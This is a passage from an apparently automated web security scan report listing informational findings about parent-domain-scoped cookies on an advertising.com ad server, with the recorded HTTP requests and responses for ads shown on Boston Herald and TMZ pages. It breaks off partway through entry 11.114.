Expires: Sat, 17 Sep 2011 01:00:38 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:00:37 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:00:38 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

11.106. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=29230852&rk1=58438691&rk2=1316239663.676&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:18 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

11.107. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=33175415&rk1=41056854&rk2=1316239356.012&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:01:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:01:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:01:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

11.108. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:02:51 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:02:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:02:51 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

11.109. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=48939657&rk1=13158778&rk2=1316239703.749&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:57 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:57 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

11.110. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:04:09 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Length: 1059
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:04:09 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

11.111. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=55474788&rk1=67672039&rk2=1316239581.661&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:05:00 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:59 GMT
Content-Length: 1061
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:05:00 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

11.112. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=40965670&rk1=31203508&rk2=1316239503.237&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:03:37 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:03:37 GMT
Content-Length: 1059
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:03:37 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

11.113. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=51723131&rk1=19795551&rk2=1316239725.286&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:07:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:07:19 GMT
Content-Length: 1061
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:07:19 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

11.114. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
